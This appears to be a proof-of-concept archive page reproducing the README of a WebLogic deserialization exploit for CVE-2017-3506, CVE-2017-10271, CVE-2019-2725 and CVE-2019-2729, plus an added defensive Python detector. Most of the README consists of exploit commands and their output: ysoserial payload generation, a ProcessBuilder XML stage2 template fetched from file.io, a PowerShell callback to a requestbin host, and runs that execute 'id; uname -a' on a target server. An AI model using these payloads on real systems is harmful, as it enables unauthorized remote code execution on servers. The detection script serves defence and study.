Associated Vulnerability
Title: Oracle Fusion Middleware WebLogic Server component access control error vulnerability (CVE-2019-2725)
Description: Oracle Fusion Middleware is a business innovation platform for enterprise and cloud environments from the US company Oracle. The platform provides middleware, software collections and other functionality. WebLogic Server is one of its components, an application server suitable for cloud and traditional environments. Some WebLogic versions include by default the wls9_async_response package, which provides asynchronous communication services for WebLogic Server. Because this WAR package has a defect when deserializing input data, an attacker can send a specially crafted malicious HTTP request and obtain privileges on the target server without authorization
Description
WebLogic Insecure Deserialization - CVE-2019-2725 payload builder & exploit
Readme
# CVE-2019-2725
WebLogic Universal Exploit - CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 payload builder & exploit
## Info / Help
```
$ python3 weblogic_exploit.py -h
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
usage: weblogic_exploit.py [-h] [-pl PAYLOAD] [-ep ENDPOINT] [-c CMD] [-j]
[-u URL] [-y YSOSERIAL] [-tr TERMINAL] [-px PROXY]
target
positional arguments:
target Target Server
optional arguments:
-h, --help show this help message and exit
-pl PAYLOAD, --payload PAYLOAD Use one of the available payloads: (default: fs_xml_app_ctx)
- process_builder (CMD - all versions)
- unit_of_work_change_set (SERIAL - 10.x versions)
- event_data (CMD - 12.x versions)
- fs_xml_app_ctx (URL - all versions).
-ep ENDPOINT, --endpoint ENDPOINT Use one of the configured endpoints: (default: automatic)
- wls_wsat (CMD output)
- _async (Blind Exec).
-c CMD, --cmd CMD Command to execute. (default: whoami)
-j, --jdk6 Enable CVE-2019-2729 (bypass for 'class'). DISCLAIMER: Works ONLY in JDK 1.6!
-u URL, --url URL Url to fetch stage2. Used with 'URL' payloads. (default: None)
-y YSOSERIAL, --ysoserial YSOSERIAL Custom YSOSERIAL payload file. Used with 'SERIAL' payloads. (default: None)
-tr TERMINAL, --terminal TERMINAL Use one of the available terminals: cmd, bash, powershell, none (default: bash)
-px PROXY, --proxy PROXY Configure a proxy in the format http://127.0.0.1:8080/ (default: None)
This script will generate a valid WebLogic SOAP payload to exploit different CVE's on this web server.
```
## Usage Examples
With the SERIAL payloads, you can pass in a cmd (to dynamically generate a ysoserial payload) or manually generate a ysoserial payload and give it to the script using the -y argument.
To dynamically generate a ysoserial payload you should download https://github.com/pimps/ysoserial-modified/blob/master/target/ysoserial-modified.jar and place it in the same directory as this script.
The payload unit_of_work_change_set is well known to work only in WebLogic 10.x versions. Examples:
```
pimps$ java -jar ysoserial-modified.jar Jdk7u21 bash 'nslookup your.server.com' > ysoserial_payload.bin
pimps$ python3 weblogic_exploit.py -y ysoserial_payload.bin -pl unit_of_work_change_set -px http://127.0.0.1:8080 https://target.server.com
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] YSOSERIAL payload size: 3182
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 202
Connection: close
Date: Wed, 28 Aug 2019 01:39:52 GMT
Content-Length: 0
pimps$ python3 weblogic_exploit.py -c 'nslookup your.server.com' -pl unit_of_work_change_set -px http://127.0.0.1:8080 https://target.server.com
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] YSOSERIAL payload size: 3027
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 202
Connection: close
Date: Wed, 28 Aug 2019 01:46:33 GMT
Content-Length: 0
```
With the URL payloads (FileSystemXmlApplicationContext) you can host your own XML and pass it with the argument -u, or let the exploit generate an ephemeral payload file for you and host it at https://file.io! This payload is generated during the exploitation phase and is deleted once the server fetches it remotely. If you want to host your own payload, please use the following template:
```
<?xml version="1.0" encoding="utf-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[echo "this is my bash command, change terminal if needed"]]></value>
</list>
</constructor-arg>
</bean>
</beans>
```
This payload is well known to work in all versions of WebLogic. Its disadvantage is that the target server needs egress connectivity to fetch the stage2 payload. An example of how to use this payload is shown below:
```
$ python weblogic_exploit.py -tr powershell -c 'Invoke-WebRequest http://requestbin.net/r/h4x31337' -pl fs_xml_app_ctx -px http://127.0.0.1:8080 https://target.server.com
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[-] No stage2 URL provided... Storing it now...
[+] Stage2 payload stored with success at: https://file.io/IbCIbg
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 202
Connection: close
Date: Tue, 27 Aug 2019 07:42:24 GMT
Content-Length: 0
```
And last but not least, the process_builder payload is the most common exploit payload (the one used by the Metasploit module) and works in WebLogic versions not patched with the `class=` blacklist. This payload was customized to print the command output in the response body of the request. Example of usage:
```
pimps$ python3 weblogic_exploit.py -c "id; uname -a" -pl process_builder http://localhost:7001/
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 200
Connection: close
Date: Thu, 29 Aug 2019 12:30:26 GMT
Transfer-Encoding: chunked
uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Linux wlsadmin 4.9.125-linuxkit #1 SMP Fri Sep 7 08:20:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```
## Updates
### 29/08/2019
Added support for the event_data payload, with command output in the response body. Example of usage:
```
$ python3 weblogic_exploit.py -c 'id; uname -a' -pl event_data http://localhost:7001
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 200
Connection: close
Date: Thu, 29 Aug 2019 07:37:26 GMT
Transfer-Encoding: chunked
uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Linux wlsadmin 4.9.125-linuxkit #1 SMP Fri Sep 7 08:20:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```
Credits: part of the payload published at https://github.com/lufeirider/CVE-2019-2725/blob/master/CVE-2019-2725.py was used to print the command results in the response body. Thanks for sharing this, @lufeirider.
### 26/09/2019
Added support for CVE-2019-2729. It is a bypass that replaces `<class> </class>` with `<array method="forName"> </array>`. This bypass works only on JDK 1.6, due to a discrepancy in how that JDK version parses XML data via XMLDecoder.
The -j/--jdk6 command-line argument was added to the exploit script.
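The payloads above all reach the wls_wsat and _async web services through XMLDecoder-driven object construction in a SOAP body, and the 2729 bypass only swaps the blacklisted `<class>` element for `<array method="forName">`. As a defender-side complement, the following added example (written for this page; it is not part of the repository) inspects HTTP requests for those markers: the `<class>` element that patched versions blacklist, the `forName` array form, and the ProcessBuilder / FileSystemXmlApplicationContext gadget class names that the process_builder and fs_xml_app_ctx payloads use. The endpoint path prefixes are assumed from the endpoint names on the page, and every sample request is constructed for the example.

```python
"""Flag WebLogic XMLDecoder deserialization attempts in HTTP requests.

Added example for this page, not code from the repository. Paths and sample
requests are constructed assumptions.
"""
import re
from typing import Dict, List, NamedTuple, Tuple

# Path prefixes of the two endpoints the README calls wls_wsat and _async.
# ASSUMPTION: derived from those endpoint names, not taken from the page.
VULNERABLE_PATH_PREFIXES = ("/wls-wsat/", "/_async/")

# Markers of XMLDecoder object construction inside a SOAP body:
#  - the <class> element that the README says patched versions blacklist,
#  - the <array method="forName"> form described for the CVE-2019-2729 bypass,
#  - the gadget classes used by the process_builder and fs_xml_app_ctx payloads.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "xmldecoder_class_element": re.compile(r"<\s*class\b", re.IGNORECASE),
    "xmldecoder_forname_bypass": re.compile(
        r"<\s*array\b[^>]*\bmethod\s*=\s*[\"']forName[\"']", re.IGNORECASE),
    "gadget_process_builder": re.compile(r"java\.lang\.ProcessBuilder"),
    "gadget_spring_fs_xml_ctx": re.compile(r"FileSystemXmlApplicationContext"),
}


class Verdict(NamedTuple):
    suspicious: bool        # any body indicator matched
    path_match: bool        # POST to one of the known-vulnerable services
    indicators: List[str]   # names of the indicators that matched


def inspect_request(method: str, path: str, body: str) -> Verdict:
    """Classify one HTTP request by its target path and SOAP body content."""
    path_match = method.upper() == "POST" and path.startswith(VULNERABLE_PATH_PREFIXES)
    hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
    # A body indicator alone is enough to flag; a matching path raises confidence
    # but a benign client may legitimately call these services.
    return Verdict(suspicious=bool(hits), path_match=path_match, indicators=hits)


def scan_requests(requests: List[Tuple[str, str, str, str]]) -> Dict[str, Verdict]:
    """Run inspect_request over (label, method, path, body) tuples."""
    return {label: inspect_request(m, p, b) for label, m, p, b in requests}


# Constructed sample traffic (not captured from any real system). The two
# malicious samples carry only the markers, not a working payload.
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SAMPLE_REQUESTS: List[Tuple[str, str, str, str]] = [
    ("benign_ws", "POST", "/wls-wsat/CoordinatorPortType",
     f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}"><soapenv:Body>'
     '<ns:Register xmlns:ns="http://example.invalid/"/>'
     '</soapenv:Body></soapenv:Envelope>'),
    ("class_element", "POST", "/_async/AsyncResponseService",
     f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}"><soapenv:Header>'
     '<class><string>java.lang.ProcessBuilder</string></class>'
     '</soapenv:Header></soapenv:Envelope>'),
    ("forname_bypass", "POST", "/_async/AsyncResponseService",
     f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}"><soapenv:Header>'
     '<array method="forName"><string>java.lang.ProcessBuilder</string></array>'
     '</soapenv:Header></soapenv:Envelope>'),
    ("gadget_off_path", "GET", "/console/login/LoginForm.jsp",
     "FileSystemXmlApplicationContext"),
]


if __name__ == "__main__":
    for label, verdict in scan_requests(SAMPLE_REQUESTS).items():
        flag = "ALERT " if verdict.suspicious else "ok    "
        print(f"{flag} {label:16} path_match={verdict.path_match} "
              f"indicators={verdict.indicators}")
```

The `forName` pattern is the one worth keeping even after the `<class>` filter is in place: the README's own changelog shows that the blacklist of a single element name is what CVE-2019-2729 steps around, so matching on element names alone is brittle and the gadget class names give a second, independent signal.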
File Snapshot
[4.0K] /data/pocs/2e540946dba53eda53d27f2a54f954f891a425f1
├── [8.9K] README.md
└── [ 13K] weblogic_exploit.py
0 directories, 2 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.